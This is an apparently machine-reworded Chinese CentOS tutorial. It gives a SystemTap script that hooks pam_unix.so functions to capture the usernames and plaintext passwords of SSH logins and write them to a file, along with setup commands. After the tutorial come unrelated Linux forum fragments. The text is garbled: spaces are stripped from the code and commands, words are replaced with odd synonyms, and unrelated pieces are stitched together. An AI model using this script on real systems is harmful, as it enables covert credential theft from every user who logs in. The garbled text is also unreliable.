给大家带来CentOS下使用systemtap抓取ssh登录的用户名和暗码

如果您觉得本篇CentOSLinux教程讲得好，请记得点击右边漂浮的分享程序，把好文章分享给你的小伙伴们！systemtap是一款十分壮大内核调试工具，能够debug良多关于kernel层的成绩。Linux是经由过程PAM模块检测用户信息和认证信息的，从而断定一个用户是不是能够登录体系，使用这个常识点，利用systemtap捕捉一下pam_unix.so该静态库文件的函数挪用，取得用户在ssh近程登录时的用户名和暗码吧。
测试情况：CentOS6.432bit
内核版本：2.6.32-358.el6.i686
起首装置以下rpm包
yum--releasever=6.4update
yuminstall-ysystemtap
debuginfo-install$(rpm-qf/lib/security/pam_unix.so)
创立文件，写进以下代码
touch/root/capture_pass.stp点击(此处)折叠或翻开

• #!/usr/bin/stap
  
• globalusername,pass,isSuccRet=1;
  
• probeprocess("/lib/security/pam_unix.so").function("_unix_verify_password")
  
• {
  
• username=user_string($name);
  
• pass=user_string($p);
  
• }
  
• probeprocess("/lib/security/pam_unix.so").function("_unix_verify_password").return
  
• {
  
• if($return==0)
  
• {
  
• printf("User:%s
  Password:%s
  
  ",username,pass);
  
• isSuccRet=0;
  
• }
  
• }
  
• probeprocess("/lib/security/pam_unix.so").function("pam_sm_open_session")
  
• {
  
• if(isSuccRet!=0)
  
• {
  
• printf("Loginviasshservice.
  User:%s
  Password:%s
  
  ",username,pass);
  
• }
  
• isSuccRet=1;
  
• }
  

付与可实行权限
chmod+xcapture_pass.stp
创立一个纪录暗码的文件
touchpassword.txt
实行systemstap剧本
stapcapture_pass.stp-opassword.txt

登录/注册后可看大图

当地实行capture_pass.stp剧本，同时ssh近程登录体系，即便第一次登录失利也没有成绩，不会纪录实验输出的毛病暗码。登录乐成后ctl+C停止剧本运转，检察password.txt，乐成捕捉。systemstap很壮大的利器，以是只要超户可使用。

登录/注册后可看大图

如果您觉得本篇CentOSLinux教程讲得好，请记得点击右边漂浮的分享程序，把好文章分享给你的小伙伴们！

为了三千积分！

放手去搞。尽量不要提问，运用搜索找答案，或者看wiki，从原理上理解操作系统的本质，而不是满足于使用几个技巧。尽量看英文资料。

笔者五分钟后就给出了解决方法： “首先备份原文件到其他目录，然后删掉/usr/local/unispim/unispimsp.ksc，编辑 /usr/local/unispim/unispimsp.ini，最后重启动计算机

说实话小时候没想过搞IT，也计算机了解也只是一些皮毛，至于什么UNIX，Linux，听过没见过，就更别说用过了。?

不同于Windows?系统需要花钱购买，因为Linux的核心是免费的，自由使用的，核心源代码是开放的。

我们自学，就这个循环的过程中，我们学习了基本操作，用vi，shell，模拟内存的分配过程等一些OS管理。

发问的时候一定要注意到某些礼节。因为Linux社区是一个松散的组织、也不承担回复每个帖子的义务。它不是技术支持。

现在的linux操作系统如redhat，难点，红旗等，都是用这么一个内核，加上其它的用程序(包括X)构成的。